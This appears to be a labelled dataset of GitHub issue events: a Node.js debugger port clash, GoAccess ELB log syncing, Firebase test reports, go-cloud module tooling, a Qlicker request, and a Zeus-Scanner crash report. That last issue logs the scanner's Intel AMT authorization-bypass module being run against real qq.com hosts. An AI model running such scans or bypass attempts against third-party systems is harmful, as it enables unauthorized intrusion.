16,374 | 21,089,198,720 | IssuesEvent | 2022-04-04 01:30:30 | nodejs/node | https://api.github.com/repos/nodejs/node | closed | Debugger doesn't work for processes which fork other processes | child_process feature request inspector stale | I'm running:
```
$ node --inspect some-node-script.js
```
Where `some-node-script.js` uses plain [`child_process.fork`](https://nodejs.org/api/all.html#child_process_child_process_fork_modulepath_args_options) (run with defaults mostly) calls to initialize few other processes internally. Right after that I receive message _Unable to open devtools socket: address already in use_:
```
$ node -v
v7.0.0
$ node --inspect some-node-script.js
Debugger listening on port 9229.
Warning: This is an experimental feature and could change at any time.
To start debugging, open the following URL in Chrome:
chrome-devtools://devtools/remote/serve_file/@60cd6e859b9f557d2312f5bf532f6aec5f284980/inspector.html?experiments=true&v8only=true&ws=localhost:9229/edbce9e9-0a9d-4c24-8f2b-bcaaeb4a5965
Unable to open devtools socket: address already in use
```
Also forked process crashes so technically application doesn't run (I've skipped that part of a log to avoid not related noise).
Behavior is same in both latest Node.js v7 and v6 (Tested on OSX, both El Captain and Sierra, with latest Chrome on board)
Am I doing something wrong, or there's no support currently for multi-process Node.js apps?
I've found similar [issue](https://github.com/nodejs/node/issues/8495) which states that this probably should just work, but gives no clue why it actually doesn't.
I'll be happy to provide simple test case if needed
| 1.0 | Debugger doesn't work for processes which fork other processes - I'm running:
```
$ node --inspect some-node-script.js
```
Where `some-node-script.js` uses plain [`child_process.fork`](https://nodejs.org/api/all.html#child_process_child_process_fork_modulepath_args_options) (run with defaults mostly) calls to initialize few other processes internally. Right after that I receive message _Unable to open devtools socket: address already in use_:
```
$ node -v
v7.0.0
$ node --inspect some-node-script.js
Debugger listening on port 9229.
Warning: This is an experimental feature and could change at any time.
To start debugging, open the following URL in Chrome:
chrome-devtools://devtools/remote/serve_file/@60cd6e859b9f557d2312f5bf532f6aec5f284980/inspector.html?experiments=true&v8only=true&ws=localhost:9229/edbce9e9-0a9d-4c24-8f2b-bcaaeb4a5965
Unable to open devtools socket: address already in use
```
Also forked process crashes so technically application doesn't run (I've skipped that part of a log to avoid not related noise).
Behavior is same in both latest Node.js v7 and v6 (Tested on OSX, both El Captain and Sierra, with latest Chrome on board)
Am I doing something wrong, or there's no support currently for multi-process Node.js apps?
I've found similar [issue](https://github.com/nodejs/node/issues/8495) which states that this probably should just work, but gives no clue why it actually doesn't.
I'll be happy to provide simple test case if needed
| process | debugger doesn t work for processes which fork other processes i m running node inspect some node script js where some node script js uses plain run with defaults mostly calls to initialize few other processes internally right after that i receive message unable to open devtools socket address already in use node v node inspect some node script js debugger listening on port warning this is an experimental feature and could change at any time to start debugging open the following url in chrome chrome devtools devtools remote serve file inspector html experiments true true ws localhost unable to open devtools socket address already in use also forked process crashes so technically application doesn t run i ve skipped that part of a log to avoid not related noise behavior is same in both latest node js and tested on osx both el captain and sierra with latest chrome on board am i doing something wrong or there s no support currently for multi process node js apps i ve found similar which states that this probably should just work but gives no clue why it actually doesn t i ll be happy to provide simple test case if needed | 1 |
6,391 | 9,475,145,836 | IssuesEvent | 2019-04-19 10:03:38 | allinurl/goaccess | https://api.github.com/repos/allinurl/goaccess | closed | syncing logs from elb - live report | log-processing other question | Hey guys, i just tried GoAccess and it works like a charm once you get to know it.
It's not an issue but more of a general question.
I have successfully parsed the S3/ELB logs after syncing them to EC2 with the s3cmd sync command.
What I am trying to do is feed that sync from S3 to GoAccess live and incrementally: since sync only ships new logs, I want only those new ones added to the report, not all of them.
If I run the command that generates report.html, it parses the whole folder, not just the new files that were copied.
Here is the command :
`find /tmp/s3/ -name "*.log" -exec cat {} \; | goaccess -a --log-format=AWSELB -p /usr/local/etc/goaccess/goaccess.conf -o /var/www/html/report.html --real-time-html`
Is there any way for GoAccess to parse only the new logs in real time, since my bucket is dozens of gigabytes? I tried something with crontab but was unsuccessful.
Thank you guys. | 1.0 | syncing logs from elb - live report - Hey guys, i just tried GoAccess and it works like a charm once you get to know it.
It's not an issue but more of a general question.
I have successfully parsed the S3/ELB logs after syncing them to EC2 with the s3cmd sync command.
What I am trying to do is feed that sync from S3 to GoAccess live and incrementally: since sync only ships new logs, I want only those new ones added to the report, not all of them.
If I run the command that generates report.html, it parses the whole folder, not just the new files that were copied.
Here is the command :
`find /tmp/s3/ -name "*.log" -exec cat {} \; | goaccess -a --log-format=AWSELB -p /usr/local/etc/goaccess/goaccess.conf -o /var/www/html/report.html --real-time-html`
Is there any way for GoAccess to parse only the new logs in real time, since my bucket is dozens of gigabytes? I tried something with crontab but was unsuccessful.
Thank you guys. | process | syncing logs from elb live report hey guys i just tried goaccess and it works like a charm once you get to know it it s not a issue but more of a logical question i am successful in parsing the elb logs that are stored there with sync command to what i am trying to do is having that sync from to goaccess live incrementally because sync works that way only new logs are shipped and i want those new ones added to the report not all of them if i put the command for report html it parses the whole folder not just the new ones that were copied here is the command find tmp name log exec cat goaccess a log format awselb p usr local etc goaccess goaccess conf o var www html report html real time html is there any possibility for goaccess to only parse the new logs in real time because my bucket is dozens of gigabytes i tried something with crontab but unsuccessful thank you guys | 1 |
20,658 | 27,329,926,796 | IssuesEvent | 2023-02-25 13:49:16 | firebase/firebase-cpp-sdk | https://api.github.com/repos/firebase/firebase-cpp-sdk | reopened | [C++] Nightly Integration Testing Report | type: process nightly-testing | Note: This report excludes firestore. Please also check **[the report for firestore](https://github.com/firebase/firebase-cpp-sdk/issues/1178)**
***
<hidden value="integration-test-status-comment"></hidden>
### ✅ [build against repo] Integration test succeeded!
Requested by @DellaBitta on commit d2776f069acbd38a576e50de5229267886774ecc
Last updated: Sat Feb 25 02:57 PST 2023
**[View integration test log & download artifacts](https://github.com/firebase/firebase-cpp-sdk/actions/runs/4269247883)**
<hidden value="integration-test-status-comment"></hidden>
***
### ✅ [build against SDK] Integration test succeeded!
Requested by @firebase-workflow-trigger[bot] on commit 1be7d248741115daaf5196413ed0d96428635796
Last updated: Fri Feb 24 15:15 PST 2023
**[View integration test log & download artifacts](https://github.com/firebase/firebase-cpp-sdk/actions/runs/4262245158)**
<hidden value="integration-test-status-comment"></hidden>
| 1.0 | [C++] Nightly Integration Testing Report - Note: This report excludes firestore. Please also check **[the report for firestore](https://github.com/firebase/firebase-cpp-sdk/issues/1178)**
***
<hidden value="integration-test-status-comment"></hidden>
### ✅ [build against repo] Integration test succeeded!
Requested by @DellaBitta on commit d2776f069acbd38a576e50de5229267886774ecc
Last updated: Sat Feb 25 02:57 PST 2023
**[View integration test log & download artifacts](https://github.com/firebase/firebase-cpp-sdk/actions/runs/4269247883)**
<hidden value="integration-test-status-comment"></hidden>
***
### ✅ [build against SDK] Integration test succeeded!
Requested by @firebase-workflow-trigger[bot] on commit 1be7d248741115daaf5196413ed0d96428635796
Last updated: Fri Feb 24 15:15 PST 2023
**[View integration test log & download artifacts](https://github.com/firebase/firebase-cpp-sdk/actions/runs/4262245158)**
<hidden value="integration-test-status-comment"></hidden>
| process | nightly integration testing report note this report excludes firestore please also check ✅ nbsp integration test succeeded requested by dellabitta on commit last updated sat feb pst ✅ nbsp integration test succeeded requested by firebase workflow trigger on commit last updated fri feb pst | 1 |
6,665 | 9,782,380,213 | IssuesEvent | 2019-06-07 23:19:28 | google/go-cloud | https://api.github.com/repos/google/go-cloud | closed | allmodules: mark modules into categories | enhancement process | Right now we have an `allmodules` file that just lists all the modules (directories where `go.mod` resides):
```
.
internal/cmd/gocdk
internal/contributebot
internal/website
samples
```
A couple of scripts use these lists of modules to perform tasks "for all modules in the repo".
As part of the work on #886, we'll need tooling to help with the release process. This tooling will need to distinguish between several categories of modules:
1. The root module (admittedly, it's easy as it's the only one that is `.`)
2. Submodules that we plan to release/track, such as separate providers split out from root as part of #886
3. Samples modules that import all the other released modules
4. Modules we use only internally and don't release. These don't need tagging
For example, prior to a release, a tool will have to add `replace` lines to all released modules that depend on root so they can be tested with the newest version. Same for `samples` depending on root and other released modules. Et cetera
| 1.0 | allmodules: mark modules into categories - Right now we have an `allmodules` file that just lists all the modules (directories where `go.mod` resides):
```
.
internal/cmd/gocdk
internal/contributebot
internal/website
samples
```
A couple of scripts use these lists of modules to perform tasks "for all modules in the repo".
As part of the work on #886, we'll need tooling to help with the release process. This tooling will need to distinguish between several categories of modules:
1. The root module (admittedly, it's easy as it's the only one that is `.`)
2. Submodules that we plan to release/track, such as separate providers split out from root as part of #886
3. Samples modules that import all the other released modules
4. Modules we use only internally and don't release. These don't need tagging
For example, prior to a release, a tool will have to add `replace` lines to all released modules that depend on root so they can be tested with the newest version. Same for `samples` depending on root and other released modules. Et cetera
| process | allmodules mark modules into categories right now we have an allmodules file that just lists all the modules directories where go mod resides internal cmd gocdk internal contributebot internal website samples a couple of scripts use these lists of modules to perform tasks for all modules in the repo as part of the work on we ll need tooling to help with the release process this tooling will need to distinguish between several categories of modules the root module admittedly it s easy as it s the only one that is submodules that we plan to release track such as separate providers split out from root as part of samples modules that import all the other released modules modules we use only internally and don t release these don t need tagging for example prior to a release a tool will have to add replace lines to all released modules that depend on root so they can be tested with the newest version same for samples depending on root and other released modules et cetera | 1 |
206,050 | 7,108,231,292 | IssuesEvent | 2018-01-16 23:01:52 | qlicker/qlicker | https://api.github.com/repos/qlicker/qlicker | closed | Prof run session should show percentage correct | Medium priority enhancement | The prof session panel should show the percentage of correct answers; perhaps inside the bar of the bar graph, the percentage of answers for each choice can be shown (the denominator should be the number of answers, not the number of students). | 1.0 | Prof run session should show percentage correct - The prof session panel should show the percentage of correct answers; perhaps inside the bar of the bar graph, the percentage of answers for each choice can be shown (the denominator should be the number of answers, not the number of students). | non_process | prof run session should show percentage correct the prof session panel should show the percentage of correct answers perhaps inside the bar of the bar graph the percentage of answers for each choice can be shown the denominator should be the number of answers not the number of students | 0 |
184,844 | 6,716,751,096 | IssuesEvent | 2017-10-14 12:48:54 | Ekultek/Zeus-Scanner | https://api.github.com/repos/Ekultek/Zeus-Scanner | closed | ConnectionError: HTTPConnectionPool(host='http', port=80): Max retries exceeded with url: //tajs.qq.com:16992/index.htm (Caused by NewConnectionError('<requests.packages.urllib3.connection.HTTPConnection object at 0xf2b6e2f0>: Failed to establish a new connection: [Errno -5] No address associated with hostname',)) | bug priority: low tool issue | Zeus version:
`1.0.46`
Firefox version:
``
Error info:
```Traceback (most recent call last):
File "/home/Scanner/Zeus-Scanner/lib/attacks/intel_me/__init__.py", line 101, in main_intel_amt
json_data = __get_hardware(url, agent=agent, proxy=proxy)
File "/home/Scanner/Zeus-Scanner/lib/attacks/intel_me/__init__.py", line 59, in __get_hardware
req = __get_raw_data(target, 'hw-sys', agent=agent, proxy=proxy)
File "/home/Scanner/Zeus-Scanner/lib/attacks/intel_me/__init__.py", line 51, in __get_raw_data
'Authorization': __get_auth_headers(target),
File "/home/Scanner/Zeus-Scanner/lib/attacks/intel_me/__init__.py", line 22, in __get_auth_headers
}, proxies=proxy)
File "/usr/local/lib/python2.7/dist-packages/requests/api.py", line 70, in get
return request('get', url, params=params, **kwargs)
File "/usr/local/lib/python2.7/dist-packages/requests/api.py", line 56, in request
return session.request(method=method, url=url, **kwargs)
File "/usr/local/lib/python2.7/dist-packages/requests/sessions.py", line 488, in request
resp = self.send(prep, **send_kwargs)
File "/usr/local/lib/python2.7/dist-packages/requests/sessions.py", line 609, in send
r = adapter.send(request, **kwargs)
File "/usr/local/lib/python2.7/dist-packages/requests/adapters.py", line 487, in send
raise ConnectionError(e, request=request)
ConnectionError: HTTPConnectionPool(host='http', port=80): Max retries exceeded with url: //tajs.qq.com:16992/index.htm (Caused by NewConnectionError('<requests.packages.urllib3.connection.HTTPConnection object at 0xf2c2f570>: Failed to establish a new connection: [Errno -5] No address associated with hostname',))
Traceback (most recent call last):
File "/home/Scanner/Zeus-Scanner/lib/attacks/intel_me/__init__.py", line 101, in main_intel_amt
json_data = __get_hardware(url, agent=agent, proxy=proxy)
File "/home/Scanner/Zeus-Scanner/lib/attacks/intel_me/__init__.py", line 59, in __get_hardware
req = __get_raw_data(target, 'hw-sys', agent=agent, proxy=proxy)
File "/home/Scanner/Zeus-Scanner/lib/attacks/intel_me/__init__.py", line 51, in __get_raw_data
'Authorization': __get_auth_headers(target),
File "/home/Scanner/Zeus-Scanner/lib/attacks/intel_me/__init__.py", line 22, in __get_auth_headers
}, proxies=proxy)
File "/usr/local/lib/python2.7/dist-packages/requests/api.py", line 70, in get
return request('get', url, params=params, **kwargs)
File "/usr/local/lib/python2.7/dist-packages/requests/api.py", line 56, in request
return session.request(method=method, url=url, **kwargs)
File "/usr/local/lib/python2.7/dist-packages/requests/sessions.py", line 488, in request
resp = self.send(prep, **send_kwargs)
File "/usr/local/lib/python2.7/dist-packages/requests/sessions.py", line 609, in send
r = adapter.send(request, **kwargs)
File "/usr/local/lib/python2.7/dist-packages/requests/adapters.py", line 487, in send
raise ConnectionError(e, request=request)
ConnectionError: HTTPConnectionPool(host='http', port=80): Max retries exceeded with url: //tajs.qq.com:16992/index.htm (Caused by NewConnectionError('<requests.packages.urllib3.connection.HTTPConnection object at 0xf2b6e2f0>: Failed to establish a new connection: [Errno -5] No address associated with hostname',))
````
Running details:
`Linux-3.18.31-perf-g0bf156d-00991-gb62734d-aarch64-with-Kali-kali-rolling-kali-rolling`
Commands used:
`zeus.py -i -b http://oneday.qq.com/admin/nologin`
Log file info:
```2017-10-14 08:58:48,324;zeus-log;INFO;log file being saved to '/home/Scanner/Zeus-Scanner/log/zeus-log-1.log'...
2017-10-14 08:58:48,325;zeus-log;INFO;using default search engine...
2017-10-14 08:58:48,326;zeus-log;INFO;starting blackwidow on 'http://oneday.qq.com/admin/nologin'...
2017-10-14 08:58:48,683;zeus-log;INFO;successfully wrote found items to '/home/Scanner/Zeus-Scanner/log/blackwidow-log/blackwidow-log-1.log'...
2017-10-14 08:58:53,186;zeus-log;INFO;attempting to connect to 'http://tajs.qq.com' and get hardware info...
2017-10-14 08:58:53,186;zeus-log;INFO;getting raw information...
2017-10-14 08:58:53,186;zeus-log;INFO;header value not established, attempting to get bypass...
2017-10-14 08:58:53,197;zeus-log;ERROR;ran into exception 'HTTPConnectionPool(host='http', port=80): Max retries exceeded with url: //tajs.qq.com:16992/index.htm (Caused by NewConnectionError('<requests.packages.urllib3.connection.HTTPConnection object at 0xf2c2f570>: Failed to establish a new connection: [Errno -5] No address associated with hostname',))', cannot continue...
Traceback (most recent call last):
File "/home/Scanner/Zeus-Scanner/lib/attacks/intel_me/__init__.py", line 101, in main_intel_amt
json_data = __get_hardware(url, agent=agent, proxy=proxy)
File "/home/Scanner/Zeus-Scanner/lib/attacks/intel_me/__init__.py", line 59, in __get_hardware
req = __get_raw_data(target, 'hw-sys', agent=agent, proxy=proxy)
File "/home/Scanner/Zeus-Scanner/lib/attacks/intel_me/__init__.py", line 51, in __get_raw_data
'Authorization': __get_auth_headers(target),
File "/home/Scanner/Zeus-Scanner/lib/attacks/intel_me/__init__.py", line 22, in __get_auth_headers
}, proxies=proxy)
File "/usr/local/lib/python2.7/dist-packages/requests/api.py", line 70, in get
return request('get', url, params=params, **kwargs)
File "/usr/local/lib/python2.7/dist-packages/requests/api.py", line 56, in request
return session.request(method=method, url=url, **kwargs)
File "/usr/local/lib/python2.7/dist-packages/requests/sessions.py", line 488, in request
resp = self.send(prep, **send_kwargs)
File "/usr/local/lib/python2.7/dist-packages/requests/sessions.py", line 609, in send
r = adapter.send(request, **kwargs)
File "/usr/local/lib/python2.7/dist-packages/requests/adapters.py", line 487, in send
raise ConnectionError(e, request=request)
ConnectionError: HTTPConnectionPool(host='http', port=80): Max retries exceeded with url: //tajs.qq.com:16992/index.htm (Caused by NewConnectionError('<requests.packages.urllib3.connection.HTTPConnection object at 0xf2c2f570>: Failed to establish a new connection: [Errno -5] No address associated with hostname',))
2017-10-14 08:58:56,146;zeus-log;INFO;Zeus got an unexpected error and will automatically create an issue for this error, please wait...
2017-10-14 08:58:56,146;zeus-log;INFO;getting authorization...
2017-10-14 08:58:56,149;zeus-log;INFO;extracting traceback from log file...
2017-10-14 08:58:56,149;zeus-log;INFO;attempting to get firefox browser version...
2017-10-14 08:58:58,128;zeus-log;INFO;issue has been created successfully with the following name 'ConnectionError: HTTPConnectionPool(host='http', port=80): Max retries exceeded with url: //tajs.qq.com:16992/index.htm (Caused by NewConnectionError('<requests.packages.urllib3.connection.HTTPConnection object at 0xf2c2f570>: Failed to establish a new connection: [Errno -5] No address associated with hostname',))'...
2017-10-14 08:59:01,580;zeus-log;INFO;attempting to connect to 'http://tajs.qq.com' and get hardware info...
2017-10-14 08:59:01,581;zeus-log;INFO;getting raw information...
2017-10-14 08:59:01,583;zeus-log;INFO;header value not established, attempting to get bypass...
2017-10-14 08:59:01,612;zeus-log;ERROR;ran into exception 'HTTPConnectionPool(host='http', port=80): Max retries exceeded with url: //tajs.qq.com:16992/index.htm (Caused by NewConnectionError('<requests.packages.urllib3.connection.HTTPConnection object at 0xf2b6e2f0>: Failed to establish a new connection: [Errno -5] No address associated with hostname',))', cannot continue...
Traceback (most recent call last):
File "/home/Scanner/Zeus-Scanner/lib/attacks/intel_me/__init__.py", line 101, in main_intel_amt
json_data = __get_hardware(url, agent=agent, proxy=proxy)
File "/home/Scanner/Zeus-Scanner/lib/attacks/intel_me/__init__.py", line 59, in __get_hardware
req = __get_raw_data(target, 'hw-sys', agent=agent, proxy=proxy)
File "/home/Scanner/Zeus-Scanner/lib/attacks/intel_me/__init__.py", line 51, in __get_raw_data
'Authorization': __get_auth_headers(target),
File "/home/Scanner/Zeus-Scanner/lib/attacks/intel_me/__init__.py", line 22, in __get_auth_headers
}, proxies=proxy)
File "/usr/local/lib/python2.7/dist-packages/requests/api.py", line 70, in get
return request('get', url, params=params, **kwargs)
File "/usr/local/lib/python2.7/dist-packages/requests/api.py", line 56, in request
return session.request(method=method, url=url, **kwargs)
File "/usr/local/lib/python2.7/dist-packages/requests/sessions.py", line 488, in request
resp = self.send(prep, **send_kwargs)
File "/usr/local/lib/python2.7/dist-packages/requests/sessions.py", line 609, in send
r = adapter.send(request, **kwargs)
File "/usr/local/lib/python2.7/dist-packages/requests/adapters.py", line 487, in send
raise ConnectionError(e, request=request)
ConnectionError: HTTPConnectionPool(host='http', port=80): Max retries exceeded with url: //tajs.qq.com:16992/index.htm (Caused by NewConnectionError('<requests.packages.urllib3.connection.HTTPConnection object at 0xf2b6e2f0>: Failed to establish a new connection: [Errno -5] No address associated with hostname',))
2017-10-14 08:59:03,105;zeus-log;INFO;Zeus got an unexpected error and will automatically create an issue for this error, please wait...
2017-10-14 08:59:03,107;zeus-log;INFO;getting authorization...
2017-10-14 08:59:03,111;zeus-log;INFO;extracting traceback from log file...
2017-10-14 08:59:03,114;zeus-log;INFO;attempting to get firefox browser version...
``` | 1.0 | ConnectionError: HTTPConnectionPool(host='http', port=80): Max retries exceeded with url: //tajs.qq.com:16992/index.htm (Caused by NewConnectionError('<requests.packages.urllib3.connection.HTTPConnection object at 0xf2b6e2f0>: Failed to establish a new connection: [Errno -5] No address associated with hostname',)) - Zeus version:
`1.0.46`
Firefox version:
``
Error info:
```Traceback (most recent call last):
File "/home/Scanner/Zeus-Scanner/lib/attacks/intel_me/__init__.py", line 101, in main_intel_amt
json_data = __get_hardware(url, agent=agent, proxy=proxy)
File "/home/Scanner/Zeus-Scanner/lib/attacks/intel_me/__init__.py", line 59, in __get_hardware
req = __get_raw_data(target, 'hw-sys', agent=agent, proxy=proxy)
File "/home/Scanner/Zeus-Scanner/lib/attacks/intel_me/__init__.py", line 51, in __get_raw_data
'Authorization': __get_auth_headers(target),
File "/home/Scanner/Zeus-Scanner/lib/attacks/intel_me/__init__.py", line 22, in __get_auth_headers
}, proxies=proxy)
File "/usr/local/lib/python2.7/dist-packages/requests/api.py", line 70, in get
return request('get', url, params=params, **kwargs)
File "/usr/local/lib/python2.7/dist-packages/requests/api.py", line 56, in request
return session.request(method=method, url=url, **kwargs)
File "/usr/local/lib/python2.7/dist-packages/requests/sessions.py", line 488, in request
resp = self.send(prep, **send_kwargs)
File "/usr/local/lib/python2.7/dist-packages/requests/sessions.py", line 609, in send
r = adapter.send(request, **kwargs)
File "/usr/local/lib/python2.7/dist-packages/requests/adapters.py", line 487, in send
raise ConnectionError(e, request=request)
ConnectionError: HTTPConnectionPool(host='http', port=80): Max retries exceeded with url: //tajs.qq.com:16992/index.htm (Caused by NewConnectionError('<requests.packages.urllib3.connection.HTTPConnection object at 0xf2c2f570>: Failed to establish a new connection: [Errno -5] No address associated with hostname',))
Traceback (most recent call last):
File "/home/Scanner/Zeus-Scanner/lib/attacks/intel_me/__init__.py", line 101, in main_intel_amt
json_data = __get_hardware(url, agent=agent, proxy=proxy)
File "/home/Scanner/Zeus-Scanner/lib/attacks/intel_me/__init__.py", line 59, in __get_hardware
req = __get_raw_data(target, 'hw-sys', agent=agent, proxy=proxy)
File "/home/Scanner/Zeus-Scanner/lib/attacks/intel_me/__init__.py", line 51, in __get_raw_data
'Authorization': __get_auth_headers(target),
File "/home/Scanner/Zeus-Scanner/lib/attacks/intel_me/__init__.py", line 22, in __get_auth_headers
}, proxies=proxy)
File "/usr/local/lib/python2.7/dist-packages/requests/api.py", line 70, in get
return request('get', url, params=params, **kwargs)
File "/usr/local/lib/python2.7/dist-packages/requests/api.py", line 56, in request
return session.request(method=method, url=url, **kwargs)
File "/usr/local/lib/python2.7/dist-packages/requests/sessions.py", line 488, in request
resp = self.send(prep, **send_kwargs)
File "/usr/local/lib/python2.7/dist-packages/requests/sessions.py", line 609, in send
r = adapter.send(request, **kwargs)
File "/usr/local/lib/python2.7/dist-packages/requests/adapters.py", line 487, in send
raise ConnectionError(e, request=request)
ConnectionError: HTTPConnectionPool(host='http', port=80): Max retries exceeded with url: //tajs.qq.com:16992/index.htm (Caused by NewConnectionError('<requests.packages.urllib3.connection.HTTPConnection object at 0xf2b6e2f0>: Failed to establish a new connection: [Errno -5] No address associated with hostname',))
````
Running details:
`Linux-3.18.31-perf-g0bf156d-00991-gb62734d-aarch64-with-Kali-kali-rolling-kali-rolling`
Commands used:
`zeus.py -i -b http://oneday.qq.com/admin/nologin`
Log file info:
```2017-10-14 08:58:48,324;zeus-log;INFO;log file being saved to '/home/Scanner/Zeus-Scanner/log/zeus-log-1.log'...
2017-10-14 08:58:48,325;zeus-log;INFO;using default search engine...
2017-10-14 08:58:48,326;zeus-log;INFO;starting blackwidow on 'http://oneday.qq.com/admin/nologin'...
2017-10-14 08:58:48,683;zeus-log;INFO;successfully wrote found items to '/home/Scanner/Zeus-Scanner/log/blackwidow-log/blackwidow-log-1.log'...
2017-10-14 08:58:53,186;zeus-log;INFO;attempting to connect to 'http://tajs.qq.com' and get hardware info...
2017-10-14 08:58:53,186;zeus-log;INFO;getting raw information...
2017-10-14 08:58:53,186;zeus-log;INFO;header value not established, attempting to get bypass...
2017-10-14 08:58:53,197;zeus-log;ERROR;ran into exception 'HTTPConnectionPool(host='http', port=80): Max retries exceeded with url: //tajs.qq.com:16992/index.htm (Caused by NewConnectionError('<requests.packages.urllib3.connection.HTTPConnection object at 0xf2c2f570>: Failed to establish a new connection: [Errno -5] No address associated with hostname',))', cannot continue...
Traceback (most recent call last):
File "/home/Scanner/Zeus-Scanner/lib/attacks/intel_me/__init__.py", line 101, in main_intel_amt
json_data = __get_hardware(url, agent=agent, proxy=proxy)
File "/home/Scanner/Zeus-Scanner/lib/attacks/intel_me/__init__.py", line 59, in __get_hardware
req = __get_raw_data(target, 'hw-sys', agent=agent, proxy=proxy)
File "/home/Scanner/Zeus-Scanner/lib/attacks/intel_me/__init__.py", line 51, in __get_raw_data
'Authorization': __get_auth_headers(target),
File "/home/Scanner/Zeus-Scanner/lib/attacks/intel_me/__init__.py", line 22, in __get_auth_headers
}, proxies=proxy)
File "/usr/local/lib/python2.7/dist-packages/requests/api.py", line 70, in get
return request('get', url, params=params, **kwargs)
File "/usr/local/lib/python2.7/dist-packages/requests/api.py", line 56, in request
return session.request(method=method, url=url, **kwargs)
File "/usr/local/lib/python2.7/dist-packages/requests/sessions.py", line 488, in request
resp = self.send(prep, **send_kwargs)
File "/usr/local/lib/python2.7/dist-packages/requests/sessions.py", line 609, in send
r = adapter.send(request, **kwargs)
File "/usr/local/lib/python2.7/dist-packages/requests/adapters.py", line 487, in send
raise ConnectionError(e, request=request)
ConnectionError: HTTPConnectionPool(host='http', port=80): Max retries exceeded with url: //tajs.qq.com:16992/index.htm (Caused by NewConnectionError('<requests.packages.urllib3.connection.HTTPConnection object at 0xf2c2f570>: Failed to establish a new connection: [Errno -5] No address associated with hostname',))
2017-10-14 08:58:56,146;zeus-log;INFO;Zeus got an unexpected error and will automatically create an issue for this error, please wait...
2017-10-14 08:58:56,146;zeus-log;INFO;getting authorization...
2017-10-14 08:58:56,149;zeus-log;INFO;extracting traceback from log file...
2017-10-14 08:58:56,149;zeus-log;INFO;attempting to get firefox browser version...
2017-10-14 08:58:58,128;zeus-log;INFO;issue has been created successfully with the following name 'ConnectionError: HTTPConnectionPool(host='http', port=80): Max retries exceeded with url: //tajs.qq.com:16992/index.htm (Caused by NewConnectionError('<requests.packages.urllib3.connection.HTTPConnection object at 0xf2c2f570>: Failed to establish a new connection: [Errno -5] No address associated with hostname',))'...
2017-10-14 08:59:01,580;zeus-log;INFO;attempting to connect to 'http://tajs.qq.com' and get hardware info...
2017-10-14 08:59:01,581;zeus-log;INFO;getting raw information...
2017-10-14 08:59:01,583;zeus-log;INFO;header value not established, attempting to get bypass...
2017-10-14 08:59:01,612;zeus-log;ERROR;ran into exception 'HTTPConnectionPool(host='http', port=80): Max retries exceeded with url: //tajs.qq.com:16992/index.htm (Caused by NewConnectionError('<requests.packages.urllib3.connection.HTTPConnection object at 0xf2b6e2f0>: Failed to establish a new connection: [Errno -5] No address associated with hostname',))', cannot continue...
Traceback (most recent call last):
File "/home/Scanner/Zeus-Scanner/lib/attacks/intel_me/__init__.py", line 101, in main_intel_amt
json_data = __get_hardware(url, agent=agent, proxy=proxy)
File "/home/Scanner/Zeus-Scanner/lib/attacks/intel_me/__init__.py", line 59, in __get_hardware
req = __get_raw_data(target, 'hw-sys', agent=agent, proxy=proxy)
File "/home/Scanner/Zeus-Scanner/lib/attacks/intel_me/__init__.py", line 51, in __get_raw_data
'Authorization': __get_auth_headers(target),
File "/home/Scanner/Zeus-Scanner/lib/attacks/intel_me/__init__.py", line 22, in __get_auth_headers
}, proxies=proxy)
File "/usr/local/lib/python2.7/dist-packages/requests/api.py", line 70, in get
return request('get', url, params=params, **kwargs)
File "/usr/local/lib/python2.7/dist-packages/requests/api.py", line 56, in request
return session.request(method=method, url=url, **kwargs)
File "/usr/local/lib/python2.7/dist-packages/requests/sessions.py", line 488, in request
resp = self.send(prep, **send_kwargs)
File "/usr/local/lib/python2.7/dist-packages/requests/sessions.py", line 609, in send
r = adapter.send(request, **kwargs)
File "/usr/local/lib/python2.7/dist-packages/requests/adapters.py", line 487, in send
raise ConnectionError(e, request=request)
ConnectionError: HTTPConnectionPool(host='http', port=80): Max retries exceeded with url: //tajs.qq.com:16992/index.htm (Caused by NewConnectionError('<requests.packages.urllib3.connection.HTTPConnection object at 0xf2b6e2f0>: Failed to establish a new connection: [Errno -5] No address associated with hostname',))
2017-10-14 08:59:03,105;zeus-log;INFO;Zeus got an unexpected error and will automatically create an issue for this error, please wait...
2017-10-14 08:59:03,107;zeus-log;INFO;getting authorization...
2017-10-14 08:59:03,111;zeus-log;INFO;extracting traceback from log file...
2017-10-14 08:59:03,114;zeus-log;INFO;attempting to get firefox browser version...
``` | non_process | connectionerror httpconnectionpool host http port max retries exceeded with url tajs qq com index htm caused by newconnectionerror failed to establish a new connection no address associated with hostname zeus version firefox version error info traceback most recent call last file home scanner zeus scanner lib attacks intel me init py line in main intel amt json data get hardware url agent agent proxy proxy file home scanner zeus scanner lib attacks intel me init py line in get hardware req get raw data target hw sys agent agent proxy proxy file home scanner zeus scanner lib attacks intel me init py line in get raw data authorization get auth headers target file home scanner zeus scanner lib attacks intel me init py line in get auth headers proxies proxy file usr local lib dist packages requests api py line in get return request get url params params kwargs file usr local lib dist packages requests api py line in request return session request method method url url kwargs file usr local lib dist packages requests sessions py line in request resp self send prep send kwargs file usr local lib dist packages requests sessions py line in send r adapter send request kwargs file usr local lib dist packages requests adapters py line in send raise connectionerror e request request connectionerror httpconnectionpool host http port max retries exceeded with url tajs qq com index htm caused by newconnectionerror failed to establish a new connection no address associated with hostname traceback most recent call last file home scanner zeus scanner lib attacks intel me init py line in main intel amt json data get hardware url agent agent proxy proxy file home scanner zeus scanner lib attacks intel me init py line in get hardware req get raw data target hw sys agent agent proxy proxy file home scanner zeus scanner lib attacks intel me init py line in get raw data authorization get auth headers target file home scanner zeus scanner lib attacks intel me init py 
line in get auth headers proxies proxy file usr local lib dist packages requests api py line in get return request get url params params kwargs file usr local lib dist packages requests api py line in request return session request method method url url kwargs file usr local lib dist packages requests sessions py line in request resp self send prep send kwargs file usr local lib dist packages requests sessions py line in send r adapter send request kwargs file usr local lib dist packages requests adapters py line in send raise connectionerror e request request connectionerror httpconnectionpool host http port max retries exceeded with url tajs qq com index htm caused by newconnectionerror failed to establish a new connection no address associated with hostname running details linux perf with kali kali rolling kali rolling commands used zeus py i b log file info zeus log info log file being saved to home scanner zeus scanner log zeus log log zeus log info using default search engine zeus log info starting blackwidow on zeus log info successfully wrote found items to home scanner zeus scanner log blackwidow log blackwidow log log zeus log info attempting to connect to and get hardware info zeus log info getting raw information zeus log info header value not established attempting to get bypass zeus log error ran into exception httpconnectionpool host http port max retries exceeded with url tajs qq com index htm caused by newconnectionerror failed to establish a new connection no address associated with hostname cannot continue traceback most recent call last file home scanner zeus scanner lib attacks intel me init py line in main intel amt json data get hardware url agent agent proxy proxy file home scanner zeus scanner lib attacks intel me init py line in get hardware req 